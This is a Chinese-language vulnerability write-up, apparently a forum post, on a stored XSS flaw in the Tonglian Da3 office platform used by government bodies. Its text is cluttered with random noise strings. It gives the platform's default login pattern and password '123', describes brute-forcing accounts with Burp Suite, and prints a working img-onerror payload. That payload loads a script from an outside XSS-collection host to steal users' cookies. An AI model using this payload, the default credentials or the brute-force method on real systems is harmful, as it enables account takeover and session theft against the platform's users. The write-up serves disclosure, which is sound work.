! z/ g v1 f2 T( A+ o7 @
# a7 ~' D" B1 z/ }- c2 v' P; o 同联Da3协同办公平台后台通用储存型xss漏洞8 i5 q* k. |6 q- ~' T
2 p4 a i+ ?( d- e" }: c ( K. Q; X8 P7 y
平台简介:
( C9 p& C' I' Y' C! D' ?$ a
" C0 J y- Z8 z. j0 O - B8 G" S, f$ v
l9 R2 B- J) k# F" ~' S5 r" d2 Y7 ?
+ k2 C' e6 ^/ }# L7 E( M
V/ s' s0 r$ }4 C
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
) P5 M( k( a3 m6 }* |
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
' [+ P2 t. C$ k5 c V, e同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
. Y/ U! |* _; w5 z
/ P, \5 T v Y7 u4 b5 G% A , i* i" M, c! h2 }% |1 G" C
6 W) w: F, d$ E. b: t, N
- r I2 W+ B2 ^6 z5 [9 X" _0 F* z
9 y1 D( J' ^' Q' J3 K. B9 _6 r 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
; H' d$ W; x% }, s+ ]$ x& n+ t
6 Q6 T% S' G' @% O" ?! R ' B+ L$ Z5 Z9 r, _9 z# v
- @% \* y, `8 T; `$ G
+ k# r9 n. y0 { T 7 q, e, ]: X/ ?9 [
http://1.1.1.1:7197/cap-aco/#(案例2-)
: [- g# @( g1 j( E9 g9 Y
# [ K1 b- I: }! v5 ?. m
& V5 |& T/ { S
http://www.XXOO.com (案例1-官网网站)
* h% o/ |) M9 N) ~) H" H* F7 x9 _
- S5 {: j+ d& V1 i0 @; I. l7 x5 G : J1 {' }, {4 L$ W- t; Q; N F
漏洞详情:& u! s R+ ?: R& `, }6 Q( W
, Y" i2 b# w9 D. ?
( e+ N, G& s2 ^4 l7 x3 J 案例一、4 D0 C6 L5 r1 L
1 C! l) n# }; A) q8 G " Y& t: }( R$ o/ Q! R; b' u
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
. s% ?5 a) A# a+ b$ K
% t* v) Z- b! U5 x
# Z+ H* i: Z `, W 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:" _1 s4 N2 E: f
6 V' B* v) s, d5 a
# a/ K3 l3 j2 S1 [: c6 x. C3 T& x
% L8 f3 \; y: P
4 t( G3 I6 m% `% m+ k
6 g7 [/ X. q. f/ a8 ?
0 d; \ ?) \; }$ c
2 F7 }, g: z0 l: Q+ G5 u1 a / v1 ~+ F' m/ y1 y4 v' c
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 9 i$ u$ _' \, W$ f4 u. W2 K
" h, i. ]2 I9 ? ! T) n5 J; w4 _3 J8 g+ x6 w0 `7 g
, K8 P2 y& Z- ?0 {, m; A7 M- g
# D" @4 }6 O0 j$ n. z# Q ! v2 D T: R% b* l( t7 R) O+ p& C" a
" t/ ]# ^9 j/ q. d& I' r. B w. X
! o! ^) d2 x0 c / a* C0 | D1 A: b# {
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 0 i8 r7 y! F$ J" s% B
9 V& ` [2 Z; g. D& ]
; ]% H: }. A9 f; I
. T9 W, l3 t8 F" {
5 @2 |, ~# \5 k' u2 h
7 }3 t* ^5 G* E3 g <img src=x% ?4 s. E$ [* _* v+ T: b
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
* c2 r' k7 S& O) @" E
+ [+ U3 o* b1 P; C! u- J ; y! C: y2 ?/ ^% A; D7 u
7 S T1 @7 o' N% }" j5 F5 P
$ b; u" Y* F& R \% `+ W: P
8 z3 a" Z: t g6 d: | 然后发送,接收cookie如图: # a u) W) b( _( |/ M9 H
; q- Z. P8 A5 \# C, [
/ G: ^7 o. }( |5 K
. Y7 J# c' ]" F2 g" ~6 n& z
4 H, t( d$ I* m; d9 L# M & N- w0 R" R3 v0 w+ o
5 Z: c) z$ Z( I) y I8 d/ n/ b
( s- `. Y8 L& m ? Q+ G- s0 t3 w
8 r* @- w9 ?, c
0 t/ I& s5 q& v
. v$ y% e* g! n8 T 9 O( v @0 M* b
2 A) W D' j4 w# z3 `
6 q2 J* m- L8 B" w+ Z/ \1 q
8 R0 d. U1 t; C4 Q
: m. O5 I6 d X) g+ @/ _2 r
7 w D1 M3 R9 x) \; x: C/ C h
5 y0 |: Q& t, m0 Z9 B4 |1 z
5 [+ t7 W" W7 p* w. M8 b+ [
! l3 v$ L3 q, H+ Q- N# ?$ C ) M. M9 c# d# I0 j; j4 w2 q
- |) i( I k4 w$ y/ G, Z: J
% b, A2 ^( ]$ h& E7 Z7 c8 U
2 f% Z, c$ \( \. b2 Y 案例2、 ( D k) Z4 [1 J6 H* @. _9 S
/ M9 Q9 ]9 e, f5 | 8 v+ Z5 o2 c {% G1 Z
前面步骤都一样,下面看效果图:
# Z0 ^0 o) w$ U8 M
& Q1 [" I; N7 [ v" I) u/ P
' ^0 \6 T( w+ {" D; s+ M0 ~
; E- z- ?8 {0 Y" T3 w
7 J; ` S1 s/ j& G, P
; q- z; b3 v! V! o. y
+ \1 O1 ?8 E; v6 G0 ~$ j4 ^9 c
2 |' G$ R- J! m1 I4 `, C& G, y% }
3 S! @. y1 E) G3 @ X O% x
# u$ M, c" Z* @4 L ~# E/ @
+ ~' x; K; B. W# r
+ a! R% d# l& ~3 n 0 k( i D! V u+ H
, t; b' U9 \$ z2 E/ a" _6 t
+ B% _; B* ], p" l/ O; M/ G6 P
! f. Q, c4 x! J* x: w% B0 [( e
7 h- q$ `" ?/ x1 W, N" C# F 8 l) O( W" L* }2 ]; G/ T
9 }) t8 A/ J" z( V; ]9 \
1 M6 v) w8 `; _4 b
$ H- h) ^" ?! ^4 _8 Z! a+ C
! g2 N, q5 i0 ~) p3 V4 O7 `0 U
+ Y( ~6 j7 F1 J- v. X
; E8 @$ @1 T) ? 0 I: @" }, ~9 S' l' E
+ s8 ?3 Q% R! P/ |, _0 B; j & l+ e T, @2 B
& V( o( O+ a( ~8 J5 b& k
+ E* l$ L7 r5 H2 {) ?5 g# H